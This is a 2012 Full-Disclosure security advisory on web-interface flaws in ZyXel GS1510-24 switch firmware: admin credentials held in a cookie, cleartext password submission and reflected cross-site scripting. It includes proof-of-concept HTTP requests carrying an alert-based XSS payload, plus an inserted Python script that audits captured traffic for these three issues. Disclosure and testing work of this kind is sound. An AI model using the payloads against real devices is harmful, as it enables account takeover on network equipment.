Message-ID: <CALyUobdLibhoZoTof_ZHVtbadM=7tARh0vntoVZtTrReryN7Qw@mail.gmail.com>
Date: Tue, 13 Mar 2012 22:14:13 +0000
From: upsploit advisories <upsploitadvisories@...ploit.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Multiple vulnerabilities in ZyXel GS1510 web front end
*Advisory Information*
Title: Multiple vulnerabilities in ZyXel GS1510 web front end
Date published: 2012-03-14 12:57:15 AM
upSploit Ref: UPS-2011-0042
*Advisory Summary*
IT Security Geeks have discovered multiple vulnerabilities in the ZyXel
GS1510 24-port Ethernet switch. These include the Admin password being
stored in a cookie, reflected Cross-Site Scripting (XSS), and clear-text
password submission.
*Vendor*
Zyxel
*Affected Software*
V1.00(BVN.1)
This is the firmware that runs on the ZyXel model GS1510-24 switch.
*Description of Issue*
The GS1510-24 ZyXel switch, running firmware V1.00(BVN.1), is susceptible
to multiple vulnerabilities. All of them lie within the management web
interface and are as follows:
1. The management web interface Cookie contains both the username and the
password for the Admin user to log into the switch.
2. Cleartext submission of password. The page contains a form with the
following action URL, which is submitted over clear-text HTTP:
http://192.168.1.5/webctrl.cgi
The form contains the following password field:
password
3. Cross Site Scripting
The payload fe07b</title><script>alert(xss)</script>b7e71e54af6 was
submitted in the name of an arbitrarily supplied request parameter.
This input was echoed unmodified in the application's response.
*PoC*
2. Cleartext submission of password.
http://192.168.1.5/webctrl.cgi
Request
GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive
3. Cross Site Scripting
The payload fe07b</title><script>alert(1)</script>b7e71e54af6 was
submitted in the name of an arbitrarily supplied request parameter.
This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application's response.
Request
GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1
Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: admin=password123
Response
HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Sep 2011 16:30:14 GMT
Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT
Accept-Ranges: bytes
Connection: close
<HTML>
<HEAD><TITLE>Index of
/images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD>
<BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>Index of /images/?fe
...[SNIP]...
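As an added defensive check (this script is not part of the advisory), the following Python code audits a captured request/response pair for the three findings described above: a known login credential carried in the Cookie header, a password form whose action posts over plain http, and a query parameter echoed into the response body without HTML escaping. The request, response and login page below are constructed samples modelled on the PoC; the host address, form action and cookie value are the ones the advisory quotes.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic modelled on the advisory's PoC (not a real capture).
REQUEST = (
    "GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1\r\n"
    "Host: 192.168.1.5\r\n"
    "Cookie: admin=password123\r\n\r\n"
)
RESPONSE_BODY = ("<HTML><HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)"
                 "</script>b7e71e54af6=1</TITLE></HEAD><BODY></BODY></HTML>")
LOGIN_PAGE = ('<form action="http://192.168.1.5/webctrl.cgi" method="post">'
              '<input type="password" name="password"></form>')

def parse_request(raw):
    """Split a raw HTTP request into (method, target, lowercase header dict)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _ = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def credentials_in_cookie(headers, username, password):
    """Return cookie pairs that carry the known login username or password."""
    hits = []
    for pair in headers.get("cookie", "").split(";"):
        name, _, value = pair.strip().partition("=")
        if name and (name == username or value == password):
            hits.append((name, value))
    return hits

def cleartext_password_forms(page_html):
    """Return action URLs of forms that hold a password field and post over http."""
    bad = []
    for form in re.findall(r"<form\b.*?</form>", page_html, flags=re.I | re.S):
        action = re.search(r'action\s*=\s*"([^"]*)"', form, flags=re.I)
        if action and re.search(r'type\s*=\s*"password"', form, flags=re.I):
            if urlsplit(action.group(1)).scheme == "http":
                bad.append(action.group(1))
    return bad

def raw_reflections(target, body):
    """Return query-parameter names/values echoed into body without HTML escaping."""
    found = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for piece in (name, value):
            if (any(c in piece for c in '<>"\'') and piece in body
                    and html.escape(piece) not in body):
                found.append(piece)
    return found

def audit():
    """Run all three checks over the constructed samples and return the evidence."""
    _, target, headers = parse_request(REQUEST)
    return {"cookie": credentials_in_cookie(headers, "admin", "password123"),
            "cleartext_forms": cleartext_password_forms(LOGIN_PAGE),
            "reflected": raw_reflections(target, RESPONSE_BODY)}

if __name__ == "__main__":
    for issue, evidence in audit().items():
        print(f"{issue}: {evidence or 'none'}")
```

Pointing the same checks at a real capture of the switch's login page and an index listing (replacing the three constants) is enough to confirm whether a firmware update has removed each issue.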
*Credits*
Neil Fryer/IT Security Geeks
*References*
ZyXel GS1510
*Patch/Fix*
Update to the latest firmware
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/